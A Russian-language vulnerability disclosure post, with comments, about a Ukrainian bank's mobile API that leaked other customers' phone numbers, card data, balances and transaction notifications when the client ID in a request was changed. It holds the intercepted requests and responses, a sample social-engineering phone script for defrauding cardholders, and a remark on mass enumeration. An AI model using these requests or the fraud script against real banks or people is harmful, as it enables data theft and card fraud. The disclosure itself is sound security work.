Первым делом я решил начать с отслеживания запросов мобильного приложения. С помощью Fiddler (Burp или Charles) я начал рассматривать каждый запрос приложения, выполняя по очереди все доступные в своём аккаунте операции. Мобильный банкинг не был защищён SSL-pinning, поэтому это не составило особого труда.
В GET и POST-запросах я пытался подменять параметры, чтобы получить искомое, но достаточно долго мне это не удавалось – я получал ошибки вида «Доступ запрещён». Однако я таки нашёл нужные мне запросы.
Например:
1. Выполнив POST-запрос на адрес вида
https://api.somebank.ua:8243/services/MobileGW.MobileGWHttpsSoap11Endpoint
С определёнными параметрами:
SOAPAction: urn:getChannels
Content-Type: text/xml
Content-Length: 780
Host: api.somebank.ua:8243
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.9.0
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ib="http://somebank.com.ua/">
<soapenv:Header>
<ib:sbbSecurityToken>594d608e-XXXX-XXXX-XXXX-31a7d4ddb016</ib:sbbSecurityToken>
<ib:locale>ru</ib:locale>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<wsse:UsernameToken>
<wsse:Username>mobile</wsse:Username>
<wsse:Password>XXXXXXXXXXXXX</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
<soapenv:Body>
<ib:getChannels>
<ib:clientId>3618336</ib:clientId>
<ib:cardId>?</ib:cardId>
</ib:getChannels>
</soapenv:Body>
</soapenv:Envelope>
В ответ я получил довольно много информации о другом клиенте:
<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><ib:locale xmlns:ib="http://ib.somebank.com.ua/">ru</ib:locale></soapenv:Header><soapenv:Body><sbb:getChannelsResponse xmlns:sbb="http://ib.somebank.com.ua/">
<sbb:getChannelsResponse>
<sbb:registeredChannels>
<sbb:cardId>6176071</sbb:cardId>
<sbb:channelId>1</sbb:channelId>
<sbb:extClientId>3618336</sbb:extClientId>
<sbb:hashNum>$1$51237890$8ADA0A63104D0FF189805755DCC31476</sbb:hashNum>
<sbb:phoneNumber>+380671234567</sbb:phoneNumber>
<sbb:regDate>2017-11-13T14:55:20+02:00</sbb:regDate>
</sbb:registeredChannels>
<sbb:registeredChannels>
<sbb:cardId>9269642</sbb:cardId>
<sbb:channelId>2</sbb:channelId>
<sbb:deviceId>8ac72969-58a9-3e82-89bd-4f51d389bd1f</sbb:deviceId>
<sbb:extClientId>3618336</sbb:extClientId>
<sbb:hashNum>$1$51231235$6B8AFE1CBCEAAEBDF6614B97A7308F90</sbb:hashNum>
<sbb:phoneNumber>+380671234567</sbb:phoneNumber>
<sbb:platform>Android</sbb:platform>
<sbb:regDate>2018-06-01T12:51:27+03:00</sbb:regDate>
<sbb:token> eCPI8kc1XXX:APA91bEetJ21_xtgWk9WnpC67kzbQfC2R8LJOAV8jCAFtKcKXwavGoOHK4sS6ymmPAwQBwgSn8CPgsLmo04OLYaA76VDxooqJBi5Hc3D_JPdqTXXX9zj7cEZAv8Z7RL0iukHvOv1lxKI</sbb:token>
</sbb:registeredChannels>
<sbb:registeredChannels>
<sbb:cardId>9869792</sbb:cardId>
<sbb:channelId>2</sbb:channelId>
<sbb:deviceId>8ac72969-58a9-3e82-89bd-4f51d3d8081f</sbb:deviceId>
<sbb:extClientId>3618336</sbb:extClientId>
<sbb:hashNum>$1$59876543$3B25E7AC7C1941AED57EB426D83FCC3D</sbb:hashNum>
<sbb:phoneNumber>+380671234567</sbb:phoneNumber>
<sbb:platform>Android</sbb:platform>
<sbb:regDate>2018-06-01T12:49:48+03:00</sbb:regDate>
<sbb:token>eCPI8kc1XXX:APA91bEetJ21_xtgWk9WnpC67kzbQfC2R8LJOAV8jCAFtKcKXwavGoOHK4sS6ymmPAwQBwgSn8CPgsLmo04OLYaA76VDxooqJBi5Hc3D_JPdqTXXX9zj7cEZAv8Z7RL0iukHvOv1lxKI</sbb:token>
</sbb:registeredChannels>
</sbb:getChannelsResponse>
</sbb:getChannelsResponse></soapenv:Body></soapenv:Envelope>
Это следующие данные:
- номер телефона клиента («phoneNumber»);
- количество карт (каждый параметр «cardId»);
- усечённые номера таких карт («hashNum»);
- дата регистрации в интернет-банкинге («regDate»);
- на каком устройстве используется приложение – Android или iOS («platform»);
- и пр.
Меняя в теле запроса параметр «ib:clientId» (в ответе это «sbb:extClientId») с 3618336 на любой другой, получаем информацию по другому клиенту.
Идём дальше.
2. Теперь у тех клиентов, где «sbb:channelId» равен «2» (канал получения клиентом уведомлений: если 1 – SMS, 2 – push), берём clientId (extClientId) и подставляем его в GET-запрос на адрес
https://api.somebank.com.ua/commgw/message/history?extClientId=3618336&pageNumber=1&pageSize=10
со следующими параметрами:
Authorization: Bearer 0e95863b-XXXX-XXXX-XXXX-71941bfb0733
Content-Type: application/json
Host: api.somebank.com.ua
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.9.0
В ответ получаем push-уведомления, которые отправляются данному клиенту:
[{"messageId":"3110600776643113261","messageBody":"Karta 5123-1235 operaciya -2861.83UAH 25.08.18 15:32 SHOP EPITSENTR, UA Dostupno: 28069.91UAH"},
{"messageId":"7150183459642079408","messageBody":"Karta 5123-1235 operaciya 56.8UAH 12/08 12:57 SOCAR PETROL STATIONS Dostupno: 30931.74UAH"},
{"messageId":"1688468957246607805","messageBody":"Karta 5123-1235 operaciya 814.3UAH 08/08 16:54 TOV AGP 5 Z PDV Dostupno: 30988.54UAH"}]
Здесь видно:
- по какой карте была операция;
- на какую сумму;
- дату и время операции;
- какая именно это была операция (покупка в магазине, снятие в банкомате или кассе, пополнение карты и т.д.);
- торговая точка, где была осуществлена данная операция — включая код авторизации, необходимый для подтверждения платежа на платёжных сайтах — LookUp, VCODE, CardVerif — об этом чуть ниже;
- баланс на карте после каждой операции.
Учитывая большое количество получаемых данных и используя социальную инженерию, существовала возможность выводить деньги с карт клиентов на платёжных сайтах.
Например, мошенник позвонит на +380509876543 со следующим разговором:
Karta 5111-1115 operaciya -62.08UAH 23.09.18 03:38 UBER TRIP PKGT4 HELP.UBER, NL Dostupno: 1349.88UAH
Karta 5111-1115 operaciya -50.00UAH 22.09.18 19:22 TAVRIYA PLUS, UA Dostupno: 1411.96UAH
Karta 5111-1115 operaciya -29.00UAH 22.09.18 10:22 MAGIC SNAIL PARK SHEVCHEN, UA Dostupno: 1461.96UAH
— Добрый день, Вас беспокоит сотрудник мониторинга SomeBank. Мы выявили подозрительную активность по Вашей карте после последней операции. Это Вы расплачивались картой 5111-1115 на 62.08 грн.?
— Наверное, да.
— Эта операция была сегодня, 23.09.18, в 03:38 в UBER. Вы подтверждаете данную операцию?
— А, да, это был я.
— А до этого Вы рассчитывались в TAVRIYA PLUS на 50 грн. и покупали кофе в PARKе SHEVCHENко за 29 грн., верно?
— Да, точно.
— Хорошо. Для того чтобы отменить мошенническую операцию на 444 грн., назовите мне номер отделения, где Ваша карта была выдана – это три цифры с обратной стороны карты, а также...
Если клиент засомневается, можно назвать другие его операции – с помощью уязвимости можно просматривать их неограниченное количество.
Итак, в рамках исследования мобильного приложения были обнаружены способы получения следующих данных:
- возможность обхода двухфакторной аутентификации на платёжных сайтах;
- номер телефона клиента;
- количество его карт;
- усечённые номера карт;
- дата регистрации в интернет-банкинге;
- сообщения, которые отправляются клиенту на смартфон. Включают в себя информацию:
- по какой карте была операция;
- на какую сумму;
- дату и время проведения транзакции;
- какая именно это была транзакция (покупка в магазине, снятие в банкомате или кассе, пополнение карты и т.д.);
- торговая точка, где была осуществлена данная операция – включая код авторизации (LookUp);
- баланс на карте после операции;
- и многое другое.
Объясню серьёзность Пункта 11. Так как карты данного банка не имеют 3D-Secure (когда при оплате в интернете клиенту в SMS отправляется код, который нужно ввести для подтверждения операции), то платёжные сервисы (например, Portmone, iPay, EasyPay и многих других) проводят операцию по таким картам без дополнительной проверки. Или запрашивают для 2FA специальный код (LookUp-код), который содержится в деталях операции — в названии торговой точки.
Таким образом, мошенники могут легко выведывать информацию о клиентах, а для подтверждения платежей будут просто смотреть нужные коды в системе банка.
Также хочется отметить, что сервис не блокировал множественные запросы, и, перебирая данные, можно было собрать базу с очень большим количеством информации.
Через некоторое время после сообщения об уязвимостях они были исправлены.
Комментарии (20)
s_suhanov
21.02.2019 19:28-1Ну то есть — "уязвимость" в том, что у человека выведывают срок действия карты и cvv-код, который никому нельзя сообщать даже сотруднику банка. Инновационно. Никогда такого не было, и вот опять.
Gorodnya Автор
21.02.2019 19:39Нет, это лишь один из более 10 пунктов того, что можно было получать по клиентам.
tuxi
21.02.2019 21:57+2[{"messageId":"3110600776643113261","messageBody":"Karta 5123-1235 operaciya -2861.83UAH 25.08.18 15:32 SHOP EPITSENTR, UA Dostupno: 28069.91UAH"}
Мда… доступ к балансу, одно это уже просто прекрасно
kikiwora
22.02.2019 10:47Я никаким образом не являюсь знатаком в области защиты данных, но как я понял, вам, в первую очередь, нужно получить, как и везде, секьюрити токен, и только после этого вы сможете получить данные, которые имеют небольшую ценность, но могут быть использованы для выуживания нужной информации с абонента.
Эти данные вы получили через специальный прокси-сервис на вашем же устройстве, тут всё понятно.
Что не понятно — так это в чём именно заключается уязвимость? Разве всё тело запроса не отправляется в зашифрованом виде? Разве токен не меняется постоянно? Могут ли его перехватить, скажем, на каком-то Wi-Fi к которому я подключусь? Вроде ж используется HTTPS, а значит и все отправляемые данные шифруются через SSL/TLS?
Получили доступ к данным через запросы имея все средства для анализа на руках, круто, но ведь это в контролируемой среде, а с другим устрйоством так прокатит?Gorodnya Автор
22.02.2019 11:20Не совсем так. Я воспроизводил свои же операции (со своими же токенами), подставляя в некоторых запросах не свои данные. И бэк сервиса отдавал мне эти данные — данные других клиентов.
Да, там HTTPS, но он расшифровывается. В приложении нет SSL-pinning, но его тоже можно было бы обойти. Что же касается токена — он меняется, но я воспроизводил со своим токеном — мне не нужен был чужой.kikiwora
22.02.2019 11:38А, вот оно как. Тогда понятно :))
Действительно, получать чужие данные по своему токену выходит за рамки нормальной работы :3
За такое увольнять надо.
Тогда возникает ещё один вопрос — можно ли как-то защитить токен/запрос?
Gorodnya Автор
22.02.2019 11:48После моего отчёта защитили)
Должна быть проверка на наличие прав у того, кто запрашивает, к тому, что он запрашивает.kikiwora
22.02.2019 11:57Нет, это как раз понятно.
Я спрашивал про защиту самого токена и другой информации что передаётся на сервер.
Все ли существующие методы защиты обходятся или есть хотя бы один надежный?Gorodnya Автор
22.02.2019 12:00Отвечая частично на первый комментарий, «я не являюсь знатоком в области защиты данных»:)
igrblkv
«назовите мне номер отделения, где Ваша карта была выдана – это три цифры с обратной стороны карты, а также...»
А что, так можно?
Gorodnya Автор
К сожалению, да. Это нам на IT-ресурсе такой вопрос покажется смешным и мошенническим, но многие могут не заметить подвоха. Знаю не понаслышке о таких скриптах разговоров, эта фраза запомнилась мне больше всего.
geisha
А банки вообще часто звонят клиентам по поводу карточных операций? Мой мне ни разу не звонил (хотя иногда блокирует операции сам). Более того, я подозреваю, что обслуживание карты отдано на аутсорс и те, кто в принципе могут мне звонить просто не знают мой номер телефона.
Gorodnya Автор
Звонят и задают практически те же самые вопросы, кроме последнего. Сам работал в мониторинге нескольких банков)
P. S.: обслуживание карт на аутсорсе малореально — безопасность, конфиденциальность, финансовые операции, все дела.
bugdesigner
Мама моего друга — пенсионерка за 70. Как-то ей позвонили "из банка" и поинтересовались номером карты, сроком действия и CVV кодом. Тоже убедительно так видно рассказывали про банковскую безопасность итд. Пожилая женщина всё им и рассказала. Хорошо, что мама догадалась рассказать обо всём сыну. Карточку бвстренько заблокировали, а мошенники остались с носом лишь потому, что на карте не было денег, а карта дебетная.
tuxi
оффтоп. есть такой развод по телефону, звонок родителям и далее, либо плачущим голосом сына рассказывают "… что попали в аварию и нужны срочно все деньги" или убедительным голосом представляются «майор такой то, мы задержали вашего сына при перевозке им наркотиков»… вот у товарища был как раз второй случай:
Мораль: надо вести разьяснительные беседы даже с очень пожилыми родителями :)
dest2r4
Бесконечность, не предел